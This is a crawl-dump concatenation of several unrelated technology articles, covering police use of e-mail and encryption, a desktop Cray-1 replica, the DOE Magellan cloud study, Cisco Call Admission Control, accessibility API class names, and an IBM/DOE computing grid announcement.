This story, "The dangers of high heels are quite real" was originally published by Fritterati. | <urn:uuid:86d0d21c-7416-487a-920c-5dcf9600ab60> | CC-MAIN-2017-04 | http://www.itnews.com/article/2932952/the-dangers-of-high-heels-are-quite-real.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00399-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.980078 | 415 | 2.53125 | 3 |
Computer technology has progressed at a fast pace over the last 10 years. Technological advancements have brought the price of powerful portable computers easily within the reach of most budgets. The notebook computer used to write this article has more computing power than the computers that helped put the first man on the moon. According to a recent survey, 37 percent of all homes in the United States now have a computer, and law enforcement agencies are rapidly becoming computerized as well.
In the past, law enforcement agencies were slow to use technology. This was primarily due to limited government budgets and the lack of a clear-cut need to make changes to existing manual systems. Now, many law enforcement agencies have computerized, and the rest are rapidly moving in that direction. Notebook computers have found their way into squad cars and have proven a great tool for writing reports. Computers are also valuable tools in the cataloging of evidence found at crime scenes and raid sites. They also make easy work of managing law enforcement evidence rooms. In some departments, computers are used to facilitate communications via e-mail, and the most progressive law enforcement agencies have created Internet Web sites to promote public relations. This is not yet the norm, and many law enforcement executives are considering for the first time how the Internet might be used by their agencies.
E-mail and other Internet features can certainly maximize the efficiency of law enforcement agencies. But some departments are hung up on whether or not potential problems outweigh potential benefits. After all, the Internet was never intended to be secure, and the perception remains that a lowlife or pervert is hiding under every "cyber rock."
True, caution should not be thrown to the wind. As with anything else that is new, proper planning and research is essential for success.
With the possible exception of an agencywide computer network, Internet e-mail is the fastest, easiest and most cost-effective means of sharing law enforcement communications. The click of a mouse can broadcast e-mail messages to one or more individuals within an agency, or even to individuals in other law enforcement agencies. If the information is sensitive, it doesn't take much extra effort to encrypt the sensitive information and attach it to an e-mail message. As long as the recipient of the message knows the password and has the ability to receive e-mail attachments, a high degree of law enforcement security can be maintained.
File encryption has proven a mixed blessing for law enforcement agencies over the last several years. In some cases, the crooks have used encryption to block law enforcement access to their communications and computer files. As a result, dealing with encrypted files has become a serious cause of hair pulling by law enforcement computer specialists. However, not everything about encryption is bad. The same technology can be used by law enforcement agencies to keep law enforcement secrets away from the criminal element. It has worked well for the military and corporations. It should work just as well for law enforcement agencies.
Military-strength file encryption software is available for government and corporate computer users from a variety of commercial sources. With e-mail attachments, the recipient doesn't even have to have a copy of the encryption program, because the sender can send the encrypted attachment as a small program run by the recipient. The only thing needed to decipher the attachment is the correct password and the ability of the recipient to receive binary attachments via e-mail. By using Internet e-mail in this fashion, law enforcement officials can easily and securely communicate using state-of-the-art technology.
Cops On The Web
Web pages are starting to become more popular in law enforcement circles. They can be used to share crime prevention information and other law enforcement communications with the public. Furthermore, the mere existence of a simple law enforcement Web site sends a clear signal to the public that the agency is modern and technologically aware. Most law enforcement computer evidence specialists have the necessary tools to create Web pages, and the cost of maintaining a site is just a few dollars a month. Some Internet service providers (ISPs) even provide free Web space as part of their services for e-mail clients. Cost should no longer be an issue for law enforcement agencies, and the time is right.
ISP or AOL?
Before intelligent decisions can be made regarding the merits of using law enforcement e-mail and Internet public relations, some areas of confusion need to be clarified. Many computer users don't fully understand the differences between ISPs and online computer services such as CompuServe and America Online. The differences are quite distinct and each have advantages and disadvantages.
An ISP essentially provides a connection or link to the Internet. The computer user normally connects to the ISP using a modem over a local or toll-free phone line. Some of these providers are small, one-man businesses that may or may not have good physical security at their computer sites. Some operate without any reliable level of computer security and leave security issues up to the user. However, ISPs usually offer the best price and, in some cities can even be obtained free of charge.
A security tour of the ISPs computer facility is normally the recommended first step for a law enforcement agency. If the facility doubles as the headquarters for the local thugs, it might be wise to move on to the next provider. But again, most Internet security concerns can be eliminated through the use of rock-solid file encryption. Many times a local ISP will also make a Web site available free of charge to law enforcement agencies that have purchased e-mail services. Such Web pages are easily created by using any one of the popular word processing programs that have HTML export capabilities. More sophisticated programs are available for under $100.
Online services are essentially huge computer networks of diverse computer users. These networks are self-contained, but also provide Internet connectivity. As with ISPs, these services are also accessed by computer users through the use of modems connected to local or toll-free, long-distance telephone lines. However, because of the nature of these large networks, there is a substantial security layer between the end user and the Internet. Online services are owned and managed by huge corporations that are security-oriented. This can be a real plus if physical security of the computer network is a concern.
Online service companies like CompuServe and America Online can be compared with television cable service providers. Cable companies provide direct access to local television channels as well as their own special channels and featured promotions like HBO and Showtime. In a similar fashion, online services give you access to the Internet along with specialized forums and other member services. Law enforcement forums on CompuServe include the Police Forum, Safetynet Forum and the Time Warner Crime Forum, to mention just a few. However, just like a cable service, add-ons can run up the cost, depending on the forum involved and the duration of access time involved.
Although a higher degree of security is provided with an online service, protection remains a concern. Any e-mail messages routed over the Internet from an online service are insecure, and file attachments can be a problem with this type of e-mail. As a result, file encryption may not be a viable safeguard unless the e-mail is routed to another user who happens to use the same online service. Also, online services do not normally provide law enforcement agencies with the ability to have their own Web sites.
Law enforcement agencies have to keep their unique needs in mind when choosing an Internet option. There are many good ISPs to choose from and there are some excellent online service providers. They all provide worldwide e-mail capabilities with varying degrees of computer security and user features. Defining the technology needs of the law enforcement agency is a good first step in the decision-making process. Also, use the expertise of the agency's computer crime unit. Usually, such computer crime specialists are experienced and well-trained on these issues. If they don't have the answers, they will have access to other computer specialists who do.
Michael R. Anderson, who retired from the IRS's Criminal Investigation Division in 1996, is internationally recognized in the fields of forensic computer science and artificial intelligence. Anderson pioneered the development of federal and international training courses that have evolved into the standards used by law enforcement agencies worldwide in the processing of computer evidence.
He also authored software applications used by law enforcement agencies in 16 countries to process evidence and to aid in the prevention of computer theft. He continues to provide software free of charge to law enforcement and the military. He is currently a consultant. Contact him at P.O. Box 929 Gresham, OR 97030. | <urn:uuid:179dab0d-1af4-4ad7-b61e-c2bde4785266> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Internet-101-For-Cops.html?page=3 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00215-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952384 | 1,737 | 2.703125 | 3 |
Nearly four decades ago, the pioneering computer architect Seymour Cray created one of the most successful and iconic supercomputers ever made, the Cray-1. This 5.5-ton C-shaped tower was a popular sight in laboratories since its release in 1976 throughout the 1980s, but eventually advances in supercomputing gave way to more powerful number crunchers.
While all of these historic Crays have long since been retired, hobbyists Chris Fenton and Andras Tantos are determined to preserve this slice of computing history. The duo are endeavoring to reconstruct a working model of the renowned Cray-1 supercomputer at desktop scale, as Gigaom’s Signe Brewster reports.
In 2010, Chris Fenton, a New York City-based electrical engineer who works with modern-day supercomputers, decided to replicate the physical form of the Cray-1 at one-tenth its original size. Because the system’s hardware was well-documented online, the project proceeded smoothly. Fenton constructed the tower using a CNC machine and Gorilla Glue and built the bench out of wood. To perfect the look, he painted the tower and upholstered the bench in pleather. The final model is a one-tenth replica of the original Cray-1 supercomputer.
Next came the interesting part – making the model operational. It was easy enough finding a board option capable of emulating the original Cray computational architecture. A $225 Spartan 3E-1600 board was small enough to fit inside the drawer that pulls out of the bench. Compared to the original Cray-1 price tag of between $5 and 8 million, $225 was a steal.
To finish the project, Fenton needed software. This was the first real stumbling block. The code for the original operating system was not to be found online. Seeking analog copies, Fenton tried the Computer History Museum and even filed FOIA requests with “scary government agencies,” all to no avail.
A lead eventually surfaced from a former Cray employee, who contributed a disk pack containing the last ever version of the Cray OS, written for the successor to the Cray-1: the Cray X-MP. At this point, Tantos, a Microsoft electrical engineer, who had been conducting his own hunt for the Cray OS, took over the recovery project. It was an arduous year-long endeavor that included reverse engineering the OS from the image, but the Cray OS now works, save for a few remaining bugs.
Fenton is now working to upgrade his desktop system to be compatible with the Cray X-MP OS. The team is also looking for a compiler, so they can write their own applications and run them on the Cray.
“In some ways it’s sad, but in other ways it’s fascinating,” Tantos told Gigaom. “Seeing how extremely hard it is to come by software for these early computers, it’s even more important that we preserve what is available.”
“The Cray-1 is one of those iconic machines that just makes you say ‘Now that’s a supercomputer!’” Fenton wrote on his blog in 2010. “Sure, your iPhone is 10X faster, and it’s completely useless to own one, but admit it … you really want one, don’t you?”
If you have information that could benefit the project, you can contact the duo here. | <urn:uuid:c85f378f-dbf8-4180-b869-c67ebd60d5ba> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/01/17/hobbyists-seek-recreate-lost-cray-supercomputer/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00123-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958873 | 738 | 3.09375 | 3 |
Two years ago, the Department of Energy's Office of Advanced Scientific Computing Research launched the Magellan project, a research and development effort aimed at harnessing cloud computing for the most demanding information processing of the national labs. A distributed testbed infrastructure was deployed at the Argonne Leadership Computing Facility and the National Energy Research ScienticComputingCenter, then benchmarked for some of the most challenging applications such as a particle physics experiment at the Large Hadron Collider or measuring the expansion of the universe. They also tested Hadoop, MapReduce, and the Hadoop ecosystem on massive scientific problems in the cloud. Their final results, published in December, show both the potential and current limitations of cloud computing for cutting-edge science. The primary appeal of cloud computing for the national labs was flexibility and agility. Through virtualization, researchers could create whatever custom computing environment they need, bring their own software stack, and try out new environments. Resources are also more flexible in the cloud, and researchers enjoyed being able to rapidly scale to a problem and tap into economies of scale for massive data sets and workflows. Another benefit of the cloud for science was that it simplified collaboration, allowing researchers to share software and experiments with their peers. Hadoop and MapReduce showed promise for high-throughput data and very large workloads. Often, the High-Performance Computingsolutions in place at the national labs have scheduling policies that aren't compatible with this type of analysis. Problems with applying deep science to the cloud, however, currently outweigh the benefits for most applications, so the national labs will not be switching over from HPC just yet. Adapting to the cloud, porting applications, and building up infrastructure took considerable time and skill, raising costs. For most applications, which deal with truly massive workloads, have idiosyncratic needs, and are input/output intensive, traditional HPC currently performs better. Cloud worked best for applications that required minimal communication. The research team also had concerns about meeting the specific security and monitoring requirements of the national labs. Price was perhaps the biggest obstacle to implementing a cloud model, as using a commercial cloud would cost between 3 and 7 times as much as the current computing centers, which already pool resources to cut costs. Even switching over to private clouds would exceed a lab's budget. Cloud computing for deep research isn't doomed, however, as almost 40% of scientists would still want a cloud model even if performance suffered. There is also a lot of room for growth in this area, and even during the 2 years of the study, researchers marked dramatic improvements to the open source software powering the cloud such as Hadoop. To move forward, researchers sought improvements to MapReduce to better fit scientific data and workflow as well as ways to bring some of the benefits of the cloud to the traditional HPC platforms the national labs have spent decades perfecting.
- Federal Researchers Push Limits Of Cloud Computing (fedcyber.com)
- Big Data Success in Government (ctovision.com)
- Congress Funds Exascale Computing (fedcyber.com) | <urn:uuid:e6926be9-b860-4ec3-851f-7b8844a3403f> | CC-MAIN-2017-04 | https://ctovision.com/lessons-learned-from-magellan/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00243-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954331 | 625 | 3.265625 | 3 |
Call Admission Control (CAC) is often times included as part of the same topic as Quality of Service (QoS), when in actuality CAC is a separate and complete topic itself.
QoS is defined as traffic engineering on a packet switched network. This definition means moving the IP Packets on to the wire and across the network in the fastest time possible, with the least amount of dropped packets. QoS manages this process by prioritizing different data flows. Packets with high sensitivity to the amount of time it takes to traverse the network receive a higher priority; such as voice and video packets.
CAC prevents over-subscription of VoIP networks. It is used in the call set-up phase and applies to Real-Time Transport Protocol traffic also known as the media portion of a call. CAC compliments QoS, however, it’s mechanisms of operation are very different from those of QoS operations. CAC protects voice traffic from the negative effects of excess voice traffic on the VoIP network, by ensuring there is enough bandwidth for all authorized flows.
In most cases CAC is done on Wide Area Networks (WAN) where there is typically only enough bandwidth to support a small volume of calls. For example, if a WAN can only support five G.729 calls and six or more calls come in on that WAN there would be degraded call quality for all calls on the WAN, not just for calls six and above. The reason call quality suffers for all calls is because of shared bandwidth. Generally, without any device to provide CAC, the system would continue to allow calls on the WAN circuit and exceed the bandwidth specifications of the WAN. With the insertion of a CAC device, the number of calls on the VoIP networks is counted with a limit set to how many calls can be placed on each WAN network. The CAC device would start rejecting call set-up messages when the limit is reached. It would be up to the initiating system to reroute the call onto another network, such as the Public Switched Telephony Network (PSTN).
Within Cisco’s IP Telephony systems there are two main types of topology unaware CAC. Topology unaware CAC is defined as any mechanism that is based on a static configuration within a call processing agent or IP-Based PBX, aimed at limiting the number of simultaneous calls to or from a remote site connected via the IP WAN. Due to the reliance on static configurations, topology unaware CAC mechanisms must be designed in a simple hub-and-spoke topology.
Location Based Call Admission Control
Cisco Unified Communications Manager (CUCM) provides a simple mechanism known as static locations for implementing CAC in the centralized call processing deployment. When you configure a device in CUCM, the device can be assigned to a location. A certain amount of bandwidth will be allocated for calls to or from each location. CUCM can define a voice and video bandwidth pool for each location. If the location’s audio and video bandwidths are configured as “Unlimited”, there will be unlimited bandwidth available for that location and every audio or video call to or from that location will be permitted by CUCM. On the other hand, if the bandwidth values are set to a finite number of kilobits per second (kbps), CUCM will allow calls in and out of that location as long as the aggregate bandwidth used by all active calls is less than or equal to the configured values.
When an inter-site call is denied by CAC, CUCM can automatically reroute the call to the destination via the PSTN connection by means of the Automated Alternate Routing (AAR) feature. AAR is invoked only when the locations-based CAC denies the call due to a lack of network bandwidth. AAR is not invoked when the IP WAN is unavailable or other connectivity issues cause the called device to become unregistered with CUCM. In such cases, the calls are redirected to the target specified in the Call Forward No Answer field of the called device.
Gatekeeper Based Call Admission Control
A Cisco IOS gatekeeper can provide call routing and CAC between devices such as CUCM, Cisco Unified Communications Manager Express (CME), or H.323 gateways connected to a legacy PBX. The gatekeeper uses the H.323 Registration Admission Status (RAS) protocol to communicate with these devices and route calls across the network.
Gatekeeper CAC is a policy-based scheme requiring static configuration of available resources. The gatekeeper is not aware of the network topology, so it is limited to simple hub-and-spoke topologies.
The CAC capabilities of a Cisco IOS gatekeeper are based on the concept of gatekeeper zones. A zone is a collection of H.323 devices, such as endpoints, gateways, or Multipoint Control Units (MCUs) that register with a gatekeeper.
The bandwidth command is used to manage the number of calls that the gatekeeper will allow, thus providing call admission control functionality. This command has several options, but the most relevant are the following:
- The interzone option controls the amount of bandwidth for all calls into or out of a given local zone.
- The total option controls the amount of bandwidth for all calls into, out of, or within a given local zone.
- The session option controls the amount of bandwidth per call for a given local zone.
- The remote option controls the total amount of bandwidth to or from all remote zones.
The bandwidth value deducted by the gatekeeper for every active call is double the bit-rate of the call, excluding Layer 2, IP, and RTP overhead.
Resource Reservation Protocol – Topology Aware CAC
CUCM Release 5.0 introduces a topology aware CAC mechanism based on the Resource Reservation Protocol (RSVP). Topology aware CAC is applicable to any network topology and eases the restriction of a traditional hub-and-spoke topology. The Cisco RSVP Agent is a Cisco IOS feature that enables CUCM to perform the RSVP-based CAC. The Cisco RSVP Agent feature has been introduced into Cisco IOS Release 12.4(6)T and is available on the Cisco 2800 Series and 3800 Series Integrated Services Routers platforms.
The Cisco RSVP Agent registers with Unified CM as either a media termination point (MTP) or a transcoder device with RSVP support. When an endpoint device makes a call in need of a bandwidth reservation, CUCM invokes a Cisco RSVP Agent to act as a proxy for the endpoint to make the bandwidth reservation.
Calculating Bandwidth for CAC
In both cases of topology unaware CAC you will have to inform the CAC mechanism how much bandwidth is available on each WAN link. You can do this by reading two of my previous posts:
Fudge Math of CAC
Calculating VoIP Bandwidth
SRND for CUCM 7.x
Author: Paul Stryer | <urn:uuid:e031e866-b1a6-410b-80d0-913a70044156> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/08/20/call-admission-control/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00179-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.914529 | 1,470 | 2.78125 | 3 |
- A11yComponentActivationEvent -
Represents an activation event from an assistive technology.
- A11yComponentActivationType -
Provides an enumeration describing the different types of activations that can be performed through accessibility.
- A11yMode -
A set of modes used to specify how a control and its subtree are exposed to assistive technologies.
- A11yRole -
A set of roles that can be used on accessibility objects for use with assistive technologies.
- A11yState -
Represents different accessible states which specifies the state of an accessible control through its accessibility object.
- A11yStateHolder -
Holds the state of an accessibility object.
- A11yValueAdjustmentType -
Represents different ways a value can be adjusted.
- AbstractA11yObject -
Defines a control's accessibility properties.
- AbstractA11ySpecialization -
Class defining an abstract accessibility specialization.
- ComponentA11ySpecialization -
Class defining a "component" accessibility specialization.
- CustomA11yObject -
Accessibility object that can be used to implement custom accessibility behavior.
- ValueA11ySpecialization -
Class defining a "Value" accessibility specialization. | <urn:uuid:6664d6d6-debe-4cd2-a326-e7f462a83e3f> | CC-MAIN-2017-04 | http://developer.blackberry.com/native/reference/cascades/user_interface_accessibility.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00299-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.714401 | 266 | 2.53125 | 3 |
This vendor-written tech primer has been edited by Network World to eliminate product promotion, but readers should note it will likely favor the submitter's approach.
Over the past few years organizations have awakened to the fact that there is knowledge hidden in Big Data, and vendors are feverishly working to develop technologies such as Hadoop Map/Reduce, Dryad, Spark and HBase to efficiently turn this data into information capital. A That push will benefit from the emergence of another technology Software Defined Networking (SDN).
Much of what constitutes Big Data is actually unstructured data. While structured data fits neatly into traditional database schemas, unstructured data is much harder to wrangle. Take, for example, video storage. While the video file type, file size, and the source IP address are all structured data, the video content itself, which doesn't fit in fixed length fields, is all unstructured. Much of the value obtained from Big Data analytics now comes from the ability to search and query unstructured data -- for example, the ability to pick out an individual from a video clip with thousands of faces using facial recognition algorithms.
The technologies aimed at the problem achieve the speed and efficiency required by parallelizing the analytic computations on the Big Data across clusters of hundreds of thousands of servers connected via high-speed Ethernet networks. Hence, the process of mining intelligence from Big Data fundamentally involves three steps: 1) Split the data into multiple server nodes; 2) Analyze each data block in parallel; 3) Merge the results.
These operations are repeated through successive stages until the entire dataset has been analyzed. A A
Owing to the Split-Merge nature of these parallel computations, Big Data Analytics can place a significant burden on the underlying network. Even with the fastest servers in the world, data processing speeds the biggest bottleneck for Big Data can only be as fast as the network's capability to transfer data between servers in both the Split and Merge phases. For example, a study on Facebook traces show this data transfer between successive stages accounted for 33% of the total running time, and for many jobs the communication phase took up over 50% of the running time.
By addressing this network bottleneck we can significantly speed up Big Data analytics which has two-fold implications: 1) Better cluster utilization reduces TCO for the cloud provider that manages the infrastructure; and 2) faster job completion times and results in real-time analytics for the customer that rents the infrastructure. A A
What we need is an intelligent network that, through each stage of the computation, adaptively scales to suit the bandwidth requirements of the data transfer in the Split & Merge phases, thereby not only improving speed-up but also improving utilization.
The role of SDN
SDN has huge potential to build the intelligent adaptive network for Big Data analytics. Due to the separation of the control and data plane, SDN provides a well-defined programmatic interface for software intelligence to program networks that are highly customizable, scalable and agile, to meet the requirements of Big Data on-demand.
SDN can configure the network on-demand to the right size and shape for compute VMs to optimally talk to one another. This directly addresses the biggest challenge that Big Data, a massively parallel application, faces - slower processing speeds. Processing speeds are slow because most compute VMs in a Big Data application spend a significant amount of time waiting for massive data during scatter-gather operations to arrive so they can begin processing. With SDN, the network can create secure pathways on-demand and scale capacity up during the scatter-gather operations thereby significantly reducing the waiting time and hence overall processing time.
This software intelligence, which is fundamentally an understanding of what the application needs from the network, can be derived with much precision and efficiency for Big Data applications. The reason is two-fold: 1) the existence of well-defined computation and communication patterns, such as Hadoop's Split-Merge or Map-Reduce paradigm; and 2) the existence of a centralized management structure that makes it possible to leverage application-level information, e.g. Hadoop Scheduler or HBase Master.
With the aid of the SDN Controller which has a global view of the underlying network its state, its utilization etc. -- the software intelligence can accurately translate the application needs by programming the network on-demand. A A A A A
SDN also offers other features that assist with management, integration and analysis of Big Data. New SDN oriented network protocols, including OpenFlow and OpenStack, promise to make network management easier, more intelligent and highly automated. OpenStack enables the set-up and configuration of network elements using a lot less manpower, and OpenFlow assists in network automation for greater flexibility to support new pressures such as data center automation, BYOD, security and application acceleration.
From a size standpoint, SDN also plays a critical role in developing network infrastructure for Big Data, facilitating streamlined management of thousands of switches, as well as the interoperability between vendors that lays the groundwork for accelerated network build out and application development. OpenFlow, a vendor-agnostic protocol that works with any vendor's OpenFlow-enabled devices, enables this interoperability, unshackling organizations from the proprietary solutions that could hinder them as they work to transform Big Data into information capital.
As the powerful implications and potential of Big Data become increasingly clear, ensuring that the network is prepared to scale to these emerging demands will be a critical step in guaranteeing long-term success. It is clear that a successful solution will leverage two key elements the existence of patterns in Big Data Applications & the programmability of the network that SDN offers. From that vantage point, SDN is indeed poised to play an important role in enabling the network to adapt further and faster, driving the pace of knowledge and innovation.
About the Author: Bithika Khargharia is a senior engineer focusing on vertical solutions and architecture at Extreme Networks. With more than a decade in the field of technology research and development with companies including Cisco, Bithika's experience in Systems Engineering spans sectors including green technology, manageability and performance; server, network, and large-scale data center architectures; distributed (grid) computing; autonomic computing; and Software-Defined Networking.
Read more about software in Network World's Software section.
This story, "SDN Networks Transform Big Data Into Information Capital" was originally published by Network World. | <urn:uuid:fbad9527-457b-411a-9cd5-b89d54f8e043> | CC-MAIN-2017-04 | http://www.cio.com/article/2381657/big-data/sdn-networks-transform-big-data-into-information-capital.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00023-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916522 | 1,325 | 2.609375 | 3 |
We usually think of the digital divide as the line between the technology “haves” and the “have nots.” A set of studies from the Cornell Center for Hospitality Research
has unearthed an additional set of dimensions involving people who have technology, but use it in different ways, starting with “users” versus “non-users.”
Let’s start with a look at fast-casual restaurant carryout orders. A study of 470 Internet users
by Cornell professor Sheryl Kimes found that about half ordered food using a restaurant’s website, mobile app or text message. Those who placed an electronic order indicated that confidence in order accuracy, convenience, and ease of ordering and delivery are important factors.
Despite this, a substantial number of participants indicated that they won’t use technology to order food because they prefer a personal connection. Overall, the telephone remains the top channel for food ordering.
On the hotel side, a study of 2,800 travelers (“How Travelers Use Online and Social Media to Make Hotel-choice Decisions
” by Laura McCarthy, Debra Stock, and Rohit Verma), found a digital divide between business and leisure travelers in terms of how they gather information about hotels. Business travelers tended to rely on recommendations from their company, but use search engines and online travel agents to work out travel details and bookings. In contrast, leisure travelers conduct a considerable search of social media sites and online travel agents and search engines. Yet, the number-one source for travel information is via friends and family.
This presents another kind of digital divide: customers do use the Internet for information gathering, but they still rely heavily on old-fashioned word-of-mouth. With the basic information and recommendations in hand, leisure travelers are more likely to turn to electronic sources for prices and availabilities. Finally, late in the process, these travelers were likely to book their room through the brand website or an OTA.
What’s more, additional research points to a demographic digital divide. The Kimes report on electronic food ordering revealed that technology users tended to be younger than non-users, and also frequent restaurants more often. But there’s more. Speaking at the Cornell Hospitality Research Summit last fall, Chris Klauda, vice president of quality services for D.K. Shifflet & Associates
, outlined the dimensions of the demographic digital divide. The challenge begins with the fact that online sampling covers “only” about 75 percent of U.S. households. That’s a lot of people, but it’s important to look at the 25 percent who are left out of Internet studies.
D.K. Shifflet studied two groups of consumers: one group of nearly 52,000 people received a monthly mail survey; the other group of just over 23,000 consumers filled out a monthly Internet questionnaire. Findings revealed that Internet-only market research studies under-represent two important groups: business travelers and households with incomes of more than $50,000 (since a heavier proportion of younger, tech-savvy travelers responding to the Internet survey haven’t yet hit their peak earning potential).
If your main market segment is leisure travelers with household incomes of under $50,000 (which is a valuable market) you may be able to rely on consumer data from Internet sources. But move carefully with regard to business and upscale travelers. A blend of electronic and traditional market research is probably the best approach. While these studies present a snapshot in time, we know that the general trend pushes toward the increasing use of the Internet and social media. However, we should not let our enthusiasm for electronic sources cause us to overlook the many dimensions of the digital divide, whether that’s for users versus non-users or business travelers versus leisure travelers. In short, don’t disconnect your landline, just yet.
Reward Point Revolution | <urn:uuid:6f1f802e-74c9-43db-ae1a-d4242e100350> | CC-MAIN-2017-04 | http://hospitalitytechnology.edgl.com/news/Dimensions-of-the-Digital-Divide73521 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00105-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.912743 | 811 | 2.578125 | 3 |
Aislabie J.M.,Landcare Research |
Lau A.,University of Auckland |
Dsouza M.,University of Auckland |
Shepherd C.,University of Auckland |
And 2 more authors.
Extremophiles | Year: 2013
The aim of this study was to examine the bacterial composition of high latitude soils from the Darwin-Hatherton glacier region of Antarctica. Four soil pits on each of four glacial drift sheets were sampled for chemical and microbial analyses. The four drifts-Hatherton, Britannia, Danum, and Isca-ranged, respectively, from early Holocene (10 ky) to mid-Quaternary (ca 900 ky). Numbers of culturable bacteria were low, with highest levels detected in soils from the younger Hatherton drift. DNA was extracted and 16S rRNA gene clone libraries prepared from samples below the desert pavement for each of the four drift sheets. Between 31 and 262 clones were analysed from each of the Hatherton, Britannia, and Danum drifts. Bacterial sequences were dominated by members of the phyla Deinococcus-Thermus, Actinobacteria, and Bacteroidetes. Culturable bacteria, including some that clustered with soil clones (e.g., members of the genera Arthrobacter, Adhaeribacter, and Pontibacter), belonged to Actinobacteria and Bacteroidetes. The isolated bacteria are ideal model organisms for genomic and phenotypic investigations of those attributes that allow bacteria to survive and/or grow in Antarctic soils because they have close relatives that are not tolerant of these conditions. © 2013 Springer Japan. Source
Agency: Department of Health and Human Services | Branch: | Program: SBIR | Phase: Phase I | Award Amount: 156.81K | Year: 2014
DESCRIPTION (provided by applicant): Cancers selected for the NIH's The Cancer Genome Atlas (TCGA) project have been chosen because of their poor prognosis and overall public health impact. Select tissue samples have been profiled for gene and miRNA expression, promoter methylation, DNA sequence and mutation analysis, as well as copy number variation (CNV), with total expenditures of 275 Million13. The copy number variation (CNV) information, derived from the raw array-based comparative genomic hybridization (aCGH) and SNP-array data, has been successfully utilized in specific application areas, such as identification of significant recurrent aberrations in each tumor type from population-wide, tumor- specific analysis. However, the full potential of this data has not yet been exploited. The two major obstacles have been the method used to perform the initial data processing which have somewhat limited its utility, and the lack of a comprehensive integrated data access and analytical platform for copy n
Biodiscovery, Inc. | Date: 2014-11-03
Agency: Department of Health and Human Services | Branch: | Program: SBIR | Phase: Phase I | Award Amount: 214.71K | Year: 2010
DESCRIPTION (provided by applicant): There is a growing demand for custom synthesis of short genes libraries coding for active peptides or regulatory RNAs. DNA microarrays can be manufactured by synthesizing oligonucleotides on solid substrate in a massively-parallel manner using a high-yield low cost chemistry. Oligonucleotides can be cleaved off the microarray surface and recovered as a pool. Our hypothesis is that we can use this technology to create custom libraries of long DNA oligonucleotides at a much reduced cost and increased complexity compared to current technologies. Our long term objectives are to implement a commercial service of affordable custom synthesis of long oligonucleotide libraries. These libraries are used as a research tools in many applications such as studies on gene silencing, protein-DNA interaction, epitope mapping or even antimicrobial peptides. There are no limits for applications than the imagination of scientists. The heath relatedness of the project resides in the facts that these applications lead to the discovery of new cellular mechanisms, diagnosis tools, drugs or even vaccines. The scope of the proposed project is 1) to demonstrate the feasibility of using an emulsion-based PCR to amplify oligonucleotide libraries; 2) to investigate the possibility to synthesize libraries of oligonucleotide up to 150 mer in length and 3) to determine the synthesis error rate and type of sequence mutations present in these libraries. We will in particular test the effect of droplet size and number of templates per droplet on the PCR amplification of oligonucleotide template in an emulsion. We wil characterize the complexity of an amplified library by deep-sequencing a PCR product. The large amount of sequence information obtained will also permit an in depth characterization the type of errors occuring during massively-parallel long oligonucleotide synthesis. PUBLIC HEALTH RELEVANCE: The unprecedented availability of affordable custom libraries of long oligonucleotides will enable new experimentations in fields such as gene silencing, protein-DNA interaction, epitope mapping or even antimicrobial peptides. This technology will undoubtedly bolster the discovery of new cellular mechanisms, diagnosis tools, drugs or even vaccines, ultimately benefiting the society.
Agency: Department of Health and Human Services | Branch: | Program: SBIR | Phase: Phase I | Award Amount: 219.26K | Year: 2010
DESCRIPTION (provided by applicant): Peptides play a significant role in the defense mechanisms of the body and binding of cells, bacteria and viruses to surfaces. Combinatorial peptide chemistry has emerged as a powerful tool for mapping receptor-ligand interactions in drug discovery applications as well as epitope mapping. There is a huge, but largely unrealized, potential for peptide microarray applications in drug discovery, study of cellular pathways and treatment of tumors. There are two reasons why the peptide micro arrays have not yet reached their potential: i) the enormous diversity possible with peptide microarrays as well as ii) the high cost of peptide microarrays in comparison to DNA microarrays. In this proposal our goals are to: 1) Develop a highly flexible and fast in situ custom peptide synthesis technology which can lower the cost of peptide microarrays by at least an order of magnitude and reduce the synthesis time to less than 24 hours for peptides containing up to 15 amino acids; 2) Increase the density of peptides on a microarray by an order of magnitude to gt10,000/array; 3) Use fluorescent probes as well as high resolution mass spectroscopy to determine sequence purity and stepwise yields for addition of each of the 20 naturally occurring amino acids. We have developed a revolutionary light gated oligonucleotide microarray synthesis technology which uses off the shelf reagents and a modified projector to carry out custom microarray synthesis on open or curved surfaces with probe densities of up to 500K/glass slide for about one tenth the cost of most commercial microarrays of similar density. In this project we will modify the chemistry and instrumentation used for oligonucelotide microarray synthesis to develop a system for combinatorial peptide synthesis on open/closed slide surfaces or membranes. | <urn:uuid:80722cf1-d59d-495e-babb-2cc1f612f999> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/biodiscovery-inc-605244/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00105-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.907461 | 1,486 | 2.671875 | 3 |
IBM and the Department of Energy are building a nationwide computer grid that ultimately will process more than 10 trillion calculations per second and storing massive amounts of data.
IBM and the U.S. Department of Energy announced on Friday that they have begun building a nationwide computer grid that ultimately will be capable of processing more than 10 trillion calculations per second and storing information equivalent to 200 times the number of books in the Library of Congress.
